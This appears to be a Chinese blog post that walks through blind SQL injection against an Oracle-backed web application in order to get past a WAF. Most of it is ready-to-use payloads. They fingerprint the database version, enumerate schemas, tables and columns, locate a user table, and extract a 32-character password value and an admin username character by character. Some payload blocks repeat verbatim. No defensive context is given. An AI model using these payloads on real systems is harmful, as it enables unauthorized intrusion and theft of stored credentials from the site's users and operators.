• Oralce注入 bypass waf出数据

       发存货:

        探测banner 版本号:

         
    ' and (SELECT banner FROM v$version where rownum=1) like 'O%' and '1'like'1

     

      rownum 相当于mysql的limit

      跑库:
        
    ' and (select owner from all_tables where rownum=1) like '_%' and '1'like'1

      

      查询用户管理库:

        

      跑表名:

       
    ' and (select table_name from user_tables where rownum = 1) like '%_%' and '1'like'1

      

      跑出第一个表名:

       
    ' and 1=decode(substr((select table_name from user_tables where rownum = 1),1,1),'S',1,0) and '1'='1

      

      判断跑第二个表,因为oracle没limit,也没top,使用like 

      获取到第一个表名是ZDZ****
      善用like:
      假设表名是SYS,含义就是排除SYS表
       
    'and+(select+table_name+from+user_tables+where+rownum=1+and+table_name+!='SYS')+like+'%%'+and'1'like'1|

      那么如何快速定位oracle数据库用户表:

      

      在数据库里面,%_%代表匹配包含的内容

    返回真说明存在包含ZTZ名称的oralce表。那么定位用户表就很简单了
    一些用户名表关键字:account/login/User/USER/ACCOUNT
    跑DM_SYSTEMUSER表包含pass的列名:
       
    'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'DM_SYSTEMUSER'+and+W_DBMANAGE.column_name+like+'%25PASS%25')+like'%25%25'and'1'like'1

      

    跑PASSWORD列:
跑DM_SYSTEMUSER表包含pass的列名:
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'DM_SYSTEMUSER'+and+W_DBMANAGE.column_name+like+'%25PASS%25')+like'%25%25'and'1'like'1

跑出具体列名:PASSWORD
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'DM_SYSTEMUSER'+and+W_DBMANAGE.column_name+like+'PASSWORD')+like'%25%25'and'1'like'1
出数据:
跑password
' and (select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1) like '%%' and '1'='1

长度32
' and length((select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1)) like '32' and '1'like'1出数据:
跑password
' and (select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1) like '%%' and '1'='1

长度32
' and length((select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1)) like '32' and '1'like'1

      跑USERNAME列数据:

       
    +and+(select+USERNAME+from+W_DBMANAGE.DM_SYSTEMUSER+where+rownum=1)+like+'%25admin%25'+and+'1'like'1
      用户名是admin:
        

        

    完整操作:
oracle注入
跑banner
' and (SELECT banner FROM v$version where rownum=1) like '_%' and '1'like'1

跑库名 默认oracle第一个表是SYS
' and (select owner from all_tables where rownum=1 and owner like '%SYS%') like '%_%' and '1'like'1

模糊测试一些包含敏感数据的表
' and length((select owner from all_tables where rownum=1 and owner like '%MANAGE%'))=10 and '1'like'1

获取表名长度10
继续跑完整MANAGE表
' and 1=decode(substr((select owner from all_tables where rownum=1 and owner like '%MANAGE%'),1,1),'S',1,0) and '1'='1

获取到表名:W_DBMANAGE

' and 1=decode(substr((select owner from all_tables where rownum=1),1,1),'S',1,0) and '1'='1

跑表名:


' and (select table_name from user_tables where rownum = 1) like '%_%' and '1'like'1


' and 1=decode(substr((select table_name from user_tables where rownum = 1),1,1),'S',1,0) and '1'='1

跑W_DBMANAGE数据库下的表信息
' and (select W_DBMANAGE.table_name from user_tables where rownum = 1) like '%_%' and '1'like'1
用这个语句跑表信息,好像有点问题
正确的查询办法:
'+and+(select W_DBMANAGE.table_name from all_tables W_DBMANAGE where rownum=1 and W_DBMANAGE.table_name like+'USER%25') like+'%25%25'+and+'1'like'1

'+and+length((select W_DBMANAGE.table_name from all_tables W_DBMANAGE where rownum=1 and W_DBMANAGE.table_name like+'USER%25')) like+'5'+and+'1'like'1

 成功定位到用户表 W_DBMANAGE下的%USER%表
跑用户表:
' and (select table_name from user_tables where rownum = 1 and table_name like '%ZDZ%') like '%_%' and '1'like'1

跑列名:

' and (select W_DBMANAGE.column_name from user_col_comments W_DBMANAGE where table_name like '%USER%' and rownum=1) like '%%' and '1'='1

查询W_DBMANAGE下的%USER%表下的列名:
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'%25USER%25'+and+W_DBMANAGE.column_name+like+'%25PASSWORD%25')+like'%25%25'and'1'like'1

列名有password



跑DM_SYSTEMUSER表包含pass的列名:
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'DM_SYSTEMUSER'+and+W_DBMANAGE.column_name+like+'%25PASS%25')+like'%25%25'and'1'like'1

跑出具体列名:PASSWORD
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'DM_SYSTEMUSER'+and+W_DBMANAGE.column_name+like+'PASSWORD')+like'%25%25'and'1'like'1

出数据:
跑password
' and (select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1) like '%%' and '1'='1

长度32
' and length((select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1)) like '32' and '1'like'1



跑数据

' and 1=decode(substr((select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1),1,1),'S',1,0) and '1'='1
最后跑出password

然后跑username:
+and+(select+USERNAME+from+W_DBMANAGE.DM_SYSTEMUSER+where+rownum=1)+like+'%25admin%25'+and+'1'like'1
     
     
     
     
  • 相关阅读:
    PyTools包罗万象的python工具包
    手撕神经网络实验报告
    数组模拟队列 以及队列的复用(环形队列)
    Sentinel熔断降级
    二维数组与稀疏数组的转换dataStructures
    Sentine熔断降级进阶
    Centos7防火墙以及端口控制
    docker的安装以及使用命令
    ToDesk个人免费 极致流畅的远程协助软件
    typora+PicGo+gitee搭建免费的的床
  • 原文地址:https://www.cnblogs.com/piaomiaohongchen/p/14602437.html
Copyright © 2020-2023  润新知